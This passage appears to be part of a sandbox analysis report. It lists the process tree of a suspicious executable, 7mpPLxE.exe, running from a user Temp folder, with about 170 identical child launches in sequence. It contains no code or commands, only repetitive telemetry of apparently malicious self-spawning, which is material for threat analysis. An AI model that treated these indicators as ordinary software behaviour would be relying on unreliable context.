      PID:5308
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5316
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5324
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5332
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5340
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5348
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5356
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5364
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5372
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5380
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5388
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5396
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5404
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5412
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5420
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5428
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5436
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5444
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5452
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5460
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5468
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5476
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5484
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5492
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5500
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5508
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5516
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5524
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5532
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5540
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5548
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5556
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5564
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5572
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5580
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5588
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5596
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5604
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5612
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5620
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5628
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5636
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5644
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5652
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5660
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5668
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5676
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5684
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5692
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5700
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5708
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5716
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5724
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5732
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5740
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5748
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5756
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5764
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5772
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5780
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5788
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5796
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5804
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5812
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5820
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5828
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5836
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5844
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5852
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5860
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5868
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5876
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5884
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5892
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5900
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5908
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5916
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5932
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5940
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5948
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5956
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5964
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5972
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5980
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5988
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5996
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6004
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6012
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6020
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6028
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6036
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6044
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6052
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6060
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6068
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6076
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6084
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6092
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6100
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6108
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6116
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6124
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6132
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6140
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6148
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6156
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6164
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6172
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6180
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6188
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6196
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6204
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6212
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6220
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6228
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6236
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6244
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6252
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6260
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6268
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6276
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6284
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6292
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6300
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6308
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6316
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6324
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6332
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6340
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6348
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6356
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6364
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6372
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6380
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6388
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6396
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6404
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6412
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6420
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6428
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6436
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6444
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6452
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6460
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6468
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6476
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6484
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6492
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6500
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6508
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6516
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6524
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6532
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6540
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6548
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6556
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6564
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6572
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6580
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6588
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6596
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6604
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6612
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6620
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6628
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6636
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6644
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6652
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6660
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6668
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6676
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6684
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:6692
